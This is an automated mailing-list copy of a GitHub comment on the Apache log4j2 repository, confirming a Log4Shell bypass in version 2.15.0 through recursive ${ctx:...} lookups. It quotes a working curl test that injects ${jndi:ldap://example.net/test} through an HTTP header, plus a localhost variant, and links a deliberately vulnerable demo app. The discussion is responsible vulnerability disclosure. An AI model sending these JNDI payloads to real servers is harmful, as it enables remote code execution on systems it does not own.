kmindi edited a comment on pull request #608: URL: https://github.com/apache/logging-log4j2/pull/608#issuecomment-993542299
thx @SpComb for confirming what I found. I'm not quite sure what that means or where we should continue the discussion about that, if it s a new attack vector etc. I just found (and this is also part of what I reported already yesterday 22:02 CET unitl waiting 12h before publishing code/comments, to the email adress for security of the logging lib [email protected]) "Variable replacement works in a recursive way." https://logging.apache.org/log4j/2.x/log4j-core/apidocs/org/apache/logging/log4j/core/lookup/StrSubstitutor.html Especially concerning is what you wrote regarding 2.15.0 ... > > Here is also the diff to see what I changed to demonstrate vulnerable `${ctx.apiversion}` usage in the log pattern: [kmindi/log4shell-vulnerable-app@e539f7e](https://github.com/kmindi/log4shell-vulnerable-app/commit/e539f7e9a0c81e2c580d63caff5f4eae14033f19) > > Can someone confirm this? > > Yes: `curl -v 172.17.0.2:8080 -H 'X-Api-Version: ${jndi:ldap://example.net/test}'` results in a DNS lookup with 2.14.1, whereas the attacker-controlled input in the message field does not: > > The bad news: this seems to also work with 2.15.0, `X-Api-Version: ${jndi:ldap://localhost/test}` results in a TCP connection to localhost:389: > This requires a [pattern configured to use `${ctx:...}` lookups](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/resources/log4j2.properties#L15-L16) with [attacker-controlled `ThreadContext` values](https://github.com/kmindi/log4shell-vulnerable-app/blob/e539f7e9a0c81e2c580d63caff5f4eae14033f19/src/main/java/fr/christophetd/log4shell/vulnerableapp/MainController.java#L20-L22), which seem to get expanded recursively. > > The 2.15.x JNDI restrictions work correctly (no DNS lookups for `example.net`, only `localhost` connections), but the 2.10.x `-Dlog4j2.formatMsgNoLookups=true` / 2.15.x https://issues.apache.org/jira/browse/LOG4J2-3198 "disable message lookups by default" does not seem to apply to `${ctx:...}` lookups. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
